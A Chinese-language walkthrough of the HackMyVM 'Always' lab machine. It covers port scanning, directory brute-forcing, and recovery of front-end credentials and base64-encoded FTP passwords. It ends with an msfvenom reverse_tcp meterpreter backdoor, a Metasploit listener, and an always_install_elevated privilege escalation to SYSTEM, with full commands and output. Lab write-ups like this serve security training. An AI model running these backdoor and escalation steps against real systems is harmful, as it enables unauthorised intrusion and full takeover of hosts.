29.Always
1. 基本信息^toc
- 1. 基本信息
- 2. 信息收集
- 3. SMB
- 4. FTP
- 5. 网址后台
- 6. ftp登录
- 6.1.1. 管理员的提示 - 7. ftp用户登录
靶机链接 https://hackmyvm.eu/machines/machine.php?vm=Always
作者 ysnmrtksk
难度 ⭐️⭐️⭐️
2. 信息收集
┌──(root㉿kali)-[/home/kali/hmv/Awayls]
└─# fping -aqg 192.168.56.0/24
192.168.56.2
192.168.56.6
192.168.56.19
┌──(root㉿kali)-[/home/kali/hmv/Awayls]
└─# fscan -h 192.168.56.19
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.4
start infoscan
192.168.56.19:445 open
192.168.56.19:139 open
192.168.56.19:135 open
192.168.56.19:21 open
192.168.56.19:8080 open
[*] alive ports len is: 5
start vulscan
[*] NetInfo
[*]192.168.56.19
[->]Always-PC
[->]192.168.56.19
[*] OsInfo 192.168.56.19 (Windows 7 Professional 7601 Service Pack 1)
[*] WebTitle http://192.168.56.19:8080 code:200 len:178 title:We Are Sorry
已完成 5/5
[*] 扫描结束,耗时: 2.252398436s
2.1. 网站主页
┌──(root㉿kali)-[/home/kali/hmv/Awayls]
└─# curl http://192.168.56.19:8080
<DOCTYPE html>
<head>
<title>We Are Sorry</title>
</head>
<body>
<center><h1>Our Site Is Under Maintenance. Please Come Back Again Later.</h1></center>
</body>
</html>
提示网站正在维护,过会再来
2.2. 目录扫描
┌──(root㉿kali)-[/home/kali/hmv/Awayls]
└─# dirsearch -u http://192.168.56.19:8080
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /home/kali/hmv/Awayls/reports/http_192.168.56.19_8080/_24-11-25_22-45-05.txt
Target: http://192.168.56.19:8080/
[22:45:08] 301 - 240B - /ADMIN -> http://192.168.56.19:8080/ADMIN/
[22:45:08] 301 - 240B - /Admin -> http://192.168.56.19:8080/Admin/
[22:45:08] 200 - 3KB - /admin%20/
[22:45:08] 301 - 240B - /admin -> http://192.168.56.19:8080/admin/
[22:45:08] 301 - 241B - /admin. -> http://192.168.56.19:8080/admin./
[22:45:09] 200 - 3KB - /Admin/
[22:45:09] 200 - 3KB - /admin/
[22:45:09] 200 - 3KB - /admin/index.html
[22:45:12] 403 - 199B - /cgi-bin/
[22:45:12] 500 - 530B - /cgi-bin/printenv.pl
[22:45:16] 403 - 199B - /index.php::$DATA
[22:45:24] 403 - 199B - /Trace.axd::$DATA
[22:45:26] 403 - 199B - /web.config::$DATA
2.3. 网站后台
尝试一下简单的弱口令
没有登录成功。并且这里我们不能根据回显判断用户是否存在。
先看下SMB SMB走不通在回来看这个网站尝试爆破
3. SMB
3.1. SMB空会话检测
┌──(root㉿kali)-[/home/kali/hmv/Awayls]
└─# smbmap -u anonymous -H 192.168.56.19
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 0 SMB session(s)
不存在空会话用户
因为这里没有域,也没有开放88端口(Kerberos的端口),所以我们也不能尝试进行kerbrute爆破
4. FTP
检测一下ftp是否存在匿名登录
┌──(root㉿kali)-[/home/kali/hmv/Awayls]
└─# ftp 192.168.56.19
Connected to 192.168.56.19.
220 Microsoft FTP Service
Name (192.168.56.19:root): anonymous
331 Password required for anonymous.
Password:
530 User cannot log in.
ftp: Login failed
也不存在ftp匿名登录
那看来只能干网站了
5. 网址后台
5.1. 前段验证密码
尝试抓包爆破时发现 点了Login抓不到包
说明这里是前段验证
直接看代码
获取到用户与密码
admin:adminpass123
成功登录后台
进来后获取到了一个提示
ZnRwdXNlcjpLZWVwR29pbmdCcm8hISE=
解密
┌──(root㉿kali)-[/home/kali/hmv/Awayls]
└─# echo 'ZnRwdXNlcjpLZWVwR29pbmdCcm8hISE=' |base64 -d
ftpuser:KeepGoingBro!!!
6. ftp登录
利用给的ftp账号密码登录
ftpuser:KeepGoingBro!!!
┌──(root㉿kali)-[/home/kali/hmv/Awayls]
└─# ftp 192.168.56.19
Connected to 192.168.56.19.
220 Microsoft FTP Service
Name (192.168.56.19:root): ftpuser
331 Password required for ftpuser.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls -a
229 Entering Extended Passive Mode (|||49159|)
125 Data connection already open; Transfer starting.
10-01-24 07:17PM 56 robots.txt
226 Transfer complete.
ftp> get robots.txt
local: robots.txt remote: robots.txt
229 Entering Extended Passive Mode (|||49161|)
125 Data connection already open; Transfer starting.
100% |****************************************************| 56 314.29 KiB/s 00:00 ETA
226 Transfer complete.
56 bytes received in 00:00 (103.57 KiB/s)
ftp> exit
221 Goodbye.
┌──(root㉿kali)-[/home/kali/hmv/Awayls]
└─# cat robots.txt
User-agent: *
Disallow: /admins-secret-pagexxx.html
获取到一个路径 /admins-secret-pagexxx.html
6.1.1. 管理员的提示
访问获取到管理员的提示
## Admin's Secret Notes
- 1) Disable the firewall and Windows Defender.
- 2) Enable FTP and SSH.
- 3) Start the Apache server.
- 4) Don't forget to change the password for user 'always'. Current password is "WW91Q2FudEZpbmRNZS4hLiE=".
┌──(root㉿kali)-[/home/kali/hmv/Awayls]
└─# echo 'WW91Q2FudEZpbmRNZS4hLiE=' |base64 -d
YouCantFindMe.!.!
根据第四条提示可以知道
用户 always
密码 YouCantFindMe.!.!
尝试利用winrm登录
发现登不进去、原来解码后的不是密码。而是提示😅
那就找一下密码吧
7. ftp用户登录
找了半天没有找到,看wp原来要直接从vbox登录Ftpuser用户
我其实有测试过winrm登录这个用户
但是失败了。我是没想到原来要从Vbox登录的。 果然是靶机啊。实战哪里有人把电脑拿过来给你登啊😅
进来后把屏幕键盘点出来,不然你会被恶心死的🤮
记得把左上角切换成EN
利用密码 KeepGoingBro!!! 进去,后提权就行了
提权很简单。我思路是直接传一个cs后门,然后直接提就行了。
生成msf后门上传 上去然后运行上线msf
生成后门
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.56.6 lport=7788 -f exe > msf7788.exe
开启监听
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.56.6
set lport 7788
run
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.56.6:7788
[*] Sending stage (176198 bytes) to 192.168.56.25
[*] Meterpreter session 1 opened (192.168.56.6:7788 -> 192.168.56.25:54117) at 2024-12-24 08:10:03 -0500
meterpreter >
然后利用 local_exploit_suggester 模块 进行检测提权漏洞
background 回到后台
user post/multi/recon/local_exploit_suggester
set session 1
run
msf6 post(multi/recon/local_exploit_suggester) > set session 1
session => 1
msf6 post(multi/recon/local_exploit_suggester) > run
[*] fe80::c471:5b9c:b92e:7e8a - Collecting local exploits for x86/windows...
[*] fe80::c471:5b9c:b92e:7e8a - 193 exploit checks are being tried...
[+] fe80::c471:5b9c:b92e:7e8a - exploit/windows/local/always_install_elevated: The target is vulnerable.
[+] fe80::c471:5b9c:b92e:7e8a - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] fe80::c471:5b9c:b92e:7e8a - exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move: The service is running, but could not be validated. Vulnerable Windows 7/Windows Server 2008 R2 build detected!
[+] fe80::c471:5b9c:b92e:7e8a - exploit/windows/local/ms10_092_schelevator: The service is running, but could not be validated.
[+] fe80::c471:5b9c:b92e:7e8a - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] fe80::c471:5b9c:b92e:7e8a - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] fe80::c471:5b9c:b92e:7e8a - exploit/windows/local/ntusermndragover: The target appears to be vulnerable.
[+] fe80::c471:5b9c:b92e:7e8a - exploit/windows/local/tokenmagic: The target appears to be vulnerable.
[*] Running check method for exploit 41 / 41
[*] fe80::c471:5b9c:b92e:7e8a - Valid modules for session 1:
============================
# Name Potentially Vulnerable? Check Result
- ---- ----------------------- ------------
1 exploit/windows/local/always_install_elevated Yes The target is vulnerable.
2 exploit/windows/local/bypassuac_eventvwr Yes The target appears to be vulnerable.
3 exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move Yes The service is running, but could not be validated. Vulnerable Windows 7/Windows Server 2008 R2 build detected!
4 exploit/windows/local/ms10_092_schelevator Yes The service is running, but could not be validated.
5 exploit/windows/local/ms14_058_track_popup_menu Yes The target appears to be vulnerable.
6 exploit/windows/local/ms15_051_client_copy_image Yes The target appears to be vulnerable.
7 exploit/windows/local/ntusermndragover Yes The target appears to be vulnerable.
8 exploit/windows/local/tokenmagic Yes The target appears to be vulnerable.
这里我们就使用推荐的第一个模块 exploit/windows/local/always_install_elevated
msf6 exploit(windows/local/always_install_elevated) > use exploit/windows/local/always_install_elevated
[*] Using configured payload windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/always_install_elevated) > show options
Module options (exploit/windows/local/always_install_elevated):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.8.96 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows
View the full module info with the info, or info -d command.
msf6 exploit(windows/local/always_install_elevated) > set lhost 192.168.56.6
lhost => 192.168.56.6
msf6 exploit(windows/local/always_install_elevated) > set lport 7788
lport => 7788
msf6 exploit(windows/local/always_install_elevated) > set session 1
session => 1
msf6 exploit(windows/local/always_install_elevated) > run
[*] Started reverse TCP handler on 192.168.56.6:7788
[*] Uploading the MSI to C:\Users\ftpuser\AppData\Local\Temp\VEPgFpavVN.msi ...
[*] Executing MSI...
[*] Sending stage (176198 bytes) to 192.168.56.25
[+] Deleted C:\Users\ftpuser\AppData\Local\Temp\VEPgFpavVN.msi
[*] Meterpreter session 2 opened (192.168.56.6:7788 -> 192.168.56.25:54480) at 2024-12-24 08:16:38 -0500
meterpreter > shell
Process 1976 created.
Channel 2 created.
Microsoft Windows [S▒r▒m 6.1.7601]
Telif Hakk▒ (c) 2009 Microsoft Corporation. T▒m haklar▒ sakl▒d▒r.
C:\Windows\system32>whoami
whoami
nt authority\system
最后是flag
HMV{You_Found_Me!}
HMV{White_Flag_Raised}